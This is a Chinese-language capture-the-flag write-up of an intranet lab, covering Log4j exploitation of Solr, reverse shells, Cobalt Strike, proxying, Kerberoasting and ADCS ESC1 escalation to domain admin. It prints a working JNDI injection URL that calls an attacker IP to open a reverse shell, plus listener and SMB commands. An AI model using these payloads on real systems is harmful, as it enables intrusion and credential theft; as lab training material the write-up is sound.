环境开起来fscan扫,没出漏洞

image-20250818104508314

直接上Tscan,没啥有用的扫出来

image-20250818104837397

goby扫扫

image-20250818104913782

两个误报

本地漏洞库没有相关记录

事已至此只能看wp发现是打一个log4j组件漏洞,顺从了

solr的log4j组件漏洞

1
2
3
4
5
java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 124.70.133.212

http://39.99.148.57:8983/solr/admin/cores?action=${jndi:ldap://124.70.133.212:1389/Basic/ReverseShell/124.70.133.212/1122}

nc -lvvp 1122

image-20250818105111082

image-20250818105139284

image-20250818105117010

命令上线vshell

image-20250818105645879

简单传个fscan\venom\CS二开linux🐎

image-20250818105958306

上线CS

image-20250818111431427

socks代理

image-20250818111502789

fscan开扫

image-20250818111524202

fscan信息整理

1
2
3
4
5
6
7
8
9
10
11
172.22.9.19 本机linux
存在xiaorang.lab域
172.22.9.7 XIAORANG-DC

172.22.9.26 DESKTOP-CBKTVMO

172.22.9.47
21端口ftp开放
80端口开放
445 administrator Pass:123456 共享:[print$ fileshare IPC$]

本地提权获取 flag1

suid

image-20250818113448563

全是fvv

guid

image-20250818113656831

全是fvv

sudo

image-20250818113719406

有个grc看看是个啥

image-20250818113811496image-20250818113844160

1
flag01: flag{eea0f723-dca9-4d0e-9de3-d5bbf2fbd86a}

smb弱口令到172.22.9.47

根据fscan扫出来的

1
proxychains -q smbclient \\\\172.22.9.47\\fileshare

image-20250818114739674

拿到flag2、提示、数据库

1
flag02: flag{130cd388-4dbe-4e7c-81b6-0c7ee03d3fe3}
image-20250818115010198

提示SPN

image-20250818160802990

感觉是Kerberoasting攻击,但是它需要提供一组有效的域内用户凭证(用户名 + 密码或哈希)才能正常工作

数据库里有用户邮箱、薪水、以及四个密码

image-20250818115046248

下一个目标包是172.22.9.26(没有题目会直接爆破域控的,做题角度),得找个服务爆破

先进行全端口扫描

image-20250818144809125

开始爆破172.22.9.26:3389看看有没有账密啥的

venom开socks;winodws代理挂上先

image-20250818145030722

image-20250818145107342

rdp爆破全部失败,Kerberoasting攻击需要的一组账密也没有,没思路了,看WP继续写

事实上,hydra的爆破日志会更加详细,所以还是用老牌爆破工具吧

一共两个格格不入的,是因为rdp服务没起,但是账密是对的

image-20250818160628597

image-20250818160608036

那就能Kerberoasting攻击了

Kerberoasting攻击

image-20250818170838723

image-20250818170815771

rdp上去

image-20250818171421676

内核没漏洞,土豆没权限,结合题目名Certify,打ADCS提权

ADCS提权

image-20250818183222497

ECS1提权

image-20250818185555329

用生成的administrator.pfx获取TGT票据和域管理员的NTLM哈希

image-20250818191630250

随便横向

image-20250818191654715

拿到flag3\4

image-20250818191837635

image-20250912151532364